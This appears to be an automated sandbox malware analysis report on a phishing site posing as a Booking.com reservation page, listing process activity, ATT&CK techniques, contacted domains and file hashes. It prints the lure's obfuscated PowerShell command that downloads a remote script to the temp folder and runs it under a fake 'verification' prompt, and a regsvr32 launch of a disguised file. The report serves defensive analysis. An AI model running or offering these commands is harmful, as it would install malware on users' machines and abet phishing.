        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7716
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2122
        Source: C:\Windows\System32\svchost.exe TID: 6452Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5484Thread sleep count: 7716 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5484Thread sleep count: 2122 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4676Thread sleep time: -4611686018427385s >= -30000s
        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

        HIPS / PFW / Operating System Protection Evasion

        Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12
        Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
        Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
        Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (1) | BITS Jobs (1) | Process Injection (11) | Masquerading (11) | OS Credential Dumping | Security Software Discovery (1) | Remote Services | Data from Local System | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | PowerShell (1) | Browser Extensions (2) | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (31) | LSASS Memory | Process Discovery (1) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (3) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | DLL Side-Loading (1) | Extra Window Memory Injection (1) | BITS Jobs (1) | Security Account Manager | Virtualization/Sandbox Evasion (31) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (4) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (5) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | File and Directory Discovery (2) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Rundll32 (1) | Cached Domain Credentials | System Information Discovery (21) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | DLL Side-Loading (1) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Extra Window Memory Injection (1) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
files.catbox.moe | 108.181.20.43 | true | false | | high
bstatic.com | 18.238.132.113 | true | false | | high
code.jquery.com | 151.101.2.137 | true | false | | high
partner.booking.com | 18.161.134.29 | true | false | | high
www.google.com | 142.250.114.99 | true | false | | high
confirm-id2719.click | 185.208.158.75 | true | false | | unknown
e10776.b.akamaiedge.net | 23.204.148.244 | true | false | | high
cdn.cookielaw.org | 104.18.87.42 | true | false | | high
try-cloudfront.abtasty.com | 108.156.224.37 | true | false | | high
try.abtasty.com | unknown | unknown | false | | high
munchkin.marketo.net | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://confirm-id2719.click/Reservation_files/protect.svg | false | | unknown
https://confirm-id2719.click/Reservation_files/no.png | false | | unknown
https://confirm-id2719.click/Reservation_files/137927810.jpg | false | | unknown
https://confirm-id2719.click/antifraud | false | | unknown
https://confirm-id2719.click/static/manage_light.v14b6812v.css | false | | unknown
https://confirm-id2719.click/Reservation_files/318586996.jpg | false | | unknown
https://confirm-id2719.click/Reservation_files/438648711.jpg | false | | unknown
https://confirm-id2719.click/Reservation_files/b_logo_blue.png | false | | unknown
https://confirm-id2719.click/Reservation_files/166939781.jpg | false | | unknown
https://confirm-id2719.click/static/favicon.svg | false | | unknown
https://confirm-id2719.click/Reservation_files/319302651.jpg | false | | unknown
https://confirm-id2719.click/ | false | | unknown
https://confirm-id2719.click/static/core_6136b7d7dc3346df1f4c9b379c38fa52.css | false | | unknown
https://confirm-id2719.click/Reservation_files/625bf8aec1510ce62b414074752052f184a60801.svg | false | | unknown
https://confirm-id2719.click/Reservation_files/319302672.jpg | false | | unknown
https://confirm-id2719.click/stuk/click | false | | unknown
https://confirm-id2719.click/Reservation_files/1df260bd9a2d14e1601c8c9ff1714c05acf328f8.svg | false | | unknown
https://confirm-id2719.click/Reservation_files/333642474.jpg | false | | unknown
https://confirm-id2719.click/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.208.158.75 | confirm-id2719.click | Switzerland | 34888 | SIMPLECARRER2IT | false
104.18.87.42 | cdn.cookielaw.org | United States | 13335 | CLOUDFLARENETUS | false
1.1.1.1 | unknown | Australia | 13335 | CLOUDFLARENETUS | false
142.250.114.102 | unknown | United States | 15169 | GOOGLEUS | false
18.238.132.113 | bstatic.com | United States | 16509 | AMAZON-02US | false
142.250.114.99 | www.google.com | United States | 15169 | GOOGLEUS | false
142.251.116.113 | unknown | United States | 15169 | GOOGLEUS | false
23.204.148.244 | e10776.b.akamaiedge.net | United States | 16625 | AKAMAI-ASUS | false
142.250.138.94 | unknown | United States | 15169 | GOOGLEUS | false
108.181.20.43 | files.catbox.moe | Canada | 852 | ASN852CA | false
142.250.115.94 | unknown | United States | 15169 | GOOGLEUS | false
142.250.113.84 | unknown | United States | 15169 | GOOGLEUS | false
142.250.114.95 | unknown | United States | 15169 | GOOGLEUS | false
142.251.116.94 | unknown | United States | 15169 | GOOGLEUS | false
18.161.134.29 | partner.booking.com | United States | 3 | MIT-GATEWAYSUS | false
173.194.208.113 | unknown | United States | 15169 | GOOGLEUS | false
151.101.2.137 | code.jquery.com | United States | 54113 | FASTLYUS | false
108.156.224.37 | try-cloudfront.abtasty.com | United States | 16509 | AMAZON-02US | false
142.250.113.138 | unknown | United States | 15169 | GOOGLEUS | false
104.69.85.120 | unknown | United States | 20940 | AKAMAI-ASN1EU | false
                                                                    IP
                                                                    192.168.2.18
                                                                    127.0.0.1
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1701511
Start date and time: 2025-05-29 15:19:32 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Sample URL: http://confirm-id2719.click/
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• EGA enabled
Analysis Mode: stream
Analysis stop reason: Timeout
Detection: MAL
Classification: mal84.phis.evad.win@29/11@23/214
• Excluded processes from analysis (whitelisted): SgrmBroker.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 142.251.116.113, 142.251.116.102, 142.251.116.100, 142.251.116.101, 142.251.116.139, 142.251.116.138, 142.250.115.94, 142.250.113.138, 142.250.113.139, 142.250.113.113, 142.250.113.101, 142.250.113.100, 142.250.113.102, 142.250.113.84, 173.194.208.100, 173.194.208.139, 173.194.208.102, 173.194.208.101, 173.194.208.138, 173.194.208.113, 142.250.138.100, 142.250.138.102, 142.250.138.138, 142.250.138.101, 142.250.138.139, 142.250.138.113, 142.250.114.102, 142.250.114.139, 142.250.114.101, 142.250.114.138, 142.250.114.100, 142.250.114.113, 142.250.114.95, 142.251.116.95, 173.194.208.95, 142.250.113.95, 142.251.186.95, 142.250.138.95, 142.250.115.95, 104.69.85.120
• Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, content-autofill.googleapis.com, clientservices.googleapis.com, clients.l.google.com, www.gstatic.com, www.google-analytics.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: confirm-id2719.click
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.3743433369764474
Encrypted: false
SSDEEP:
MD5: BFC24FE0897A4F6FDE009AA94276C0C0
SHA1: 1C0FC7B814F751364BE0B5BE411E23BE56E5AC35
SHA-256: CE554286D1A0D1109BB706A3ABC47D32904D9BC1AA5D78D1B87F7321E208AC25
SHA-512: E5B91E90B3103F0956FD29AC1E25FCABC7A6A08585FC67C069484B310F333E8146CCCAB3CCA6E44207AA8D57825C7F062A451C91B3CD637ED7A912A84EF4D4E2
Malicious: false
Reputation: unknown
Preview: binary data; readable strings include C:\ProgramData\Microsoft\Network\Downloader\ and C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.08019355134990572
Encrypted: false
SSDEEP:
